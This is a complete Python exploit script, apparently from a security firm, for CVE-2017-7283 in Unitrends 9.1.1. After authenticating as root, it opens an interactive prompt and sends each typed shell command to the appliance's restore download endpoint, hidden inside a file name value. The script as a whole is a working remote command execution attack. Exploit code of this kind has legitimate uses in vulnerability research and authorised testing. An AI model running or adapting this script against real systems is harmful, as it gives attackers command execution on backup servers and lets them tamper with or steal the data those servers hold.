CVE-2017-7283/CVE-2017-7283.py

#!/usr/bin/python
import requests
import optparse
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning

def main():
	parser = optparse.OptionParser("%prog -u https://url_to_unitrends_server.com -U root -P root_pass [-S session_cookie]")
	parser.add_option("-U", dest="username", type="string", help="Username with root privledges to login to Admin interface.")
	parser.add_option("-u", dest="url", type="string", help="URL or IP of Unitrends server.")
	parser.add_option("-P", dest="password", type="string", help="Root user's password.")
	parser.add_option("-a", dest="auth_string", type="string", help="Authentication string of a logged in user.")
	(options, args) = parser.parse_args()
	print "[+] Unitrends 9.1.1 RCE via Restore Exploit"
	print "[+] Created by Dwight H. from Rhino Security Labs"
	if not options.url or not((options.username and options.password) or options.session):
		print "[-] Not enough arguments given."
		return
	s = requests.Session()
	url = options.url
	if url[-1] == "/":
		url = url[:-1]
	auth_string = options.auth_string
	if not auth_string:
		print "[+] Attempting to login with {}:{}".format(options.username, options.password)
		# Disable logging messages all the time
		requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
		r = s.get(url, verify=False)
		login = {"username": options.username, "password": options.password}
		r = s.post(url + "/api/login", data=json.dumps(login), verify=False)
		superuser_data = r.json()
		auth_string = superuser_data.get('auth_token')
		if auth_string:
			print "[+] Authentication successful."
		else:
			print "[-] Authentication not successful."
			return
	print "[+] Dropping into command prompt. (Note: No return text for your command will be available.)"
	headers = {"AuthToken": auth_string}
	try:
		while True:
			cmd = raw_input("#> ")
			data = {
				"filenames": ["'\n{}\n".format(cmd)]
			}
			r = s.post(url + "/api/restore/download-files", data=json.dumps(data), headers=headers, verify=False)
			print r.content
	except KeyboardInterrupt:
		print "\n[+] Exiting"

if __name__== "__main__":
	main()